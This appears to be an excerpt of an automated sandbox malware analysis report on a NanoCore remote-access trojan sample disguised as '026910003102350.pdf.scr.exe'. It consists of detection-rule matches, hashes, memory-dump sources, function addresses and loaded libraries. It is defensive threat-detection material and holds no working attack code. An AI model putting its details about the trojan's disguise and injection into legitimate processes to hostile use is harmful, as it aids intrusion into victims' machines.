Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: initial sample Static PE information: Filename: 026910003102350.pdf.scr.exe
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CC848E 0_2_00CC848E
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CD6CDC 0_2_00CD6CDC
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CC40FE 0_2_00CC40FE
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CD4088 0_2_00CD4088
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CD00B7 0_2_00CD00B7
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CE51C9 0_2_00CE51C9
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CD7153 0_2_00CD7153
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CD62CA 0_2_00CD62CA
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CC32F7 0_2_00CC32F7
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CD43BF 0_2_00CD43BF
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CED440 0_2_00CED440
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CCF461 0_2_00CCF461
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CCC426 0_2_00CCC426
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CD77EF 0_2_00CD77EF
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CED8EE 0_2_00CED8EE
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CC286B 0_2_00CC286B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CF19F4 0_2_00CF19F4
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CCE9B7 0_2_00CCE9B7
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CD3E0B 0_2_00CD3E0B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CCEFE2 0_2_00CCEFE2
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CE4F9A 0_2_00CE4F9A
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00338037 2_2_00338037
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00332007 2_2_00332007
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0032E0BE 2_2_0032E0BE
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0031E1A0 2_2_0031E1A0
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0031225D 2_2_0031225D
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0034A28E 2_2_0034A28E
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003322C2 2_2_003322C2
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0032C59E 2_2_0032C59E
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0039C7A3 2_2_0039C7A3
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0034E89F 2_2_0034E89F
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0038291A 2_2_0038291A
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00346AFB 2_2_00346AFB
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00378B27 2_2_00378B27
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0033CE30 2_2_0033CE30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00347169 2_2_00347169
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003A51D2 2_2_003A51D2
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00319240 2_2_00319240
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00319499 2_2_00319499
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00331724 2_2_00331724
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00331A96 2_2_00331A96
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00319B60 2_2_00319B60
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00337BAB 2_2_00337BAB
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00331D40 2_2_00331D40
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00337DDA 2_2_00337DDA
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00371A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 2_2_00371A91
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Section loaded: dxgidebug.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
Source: 026910003102350.pdf.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
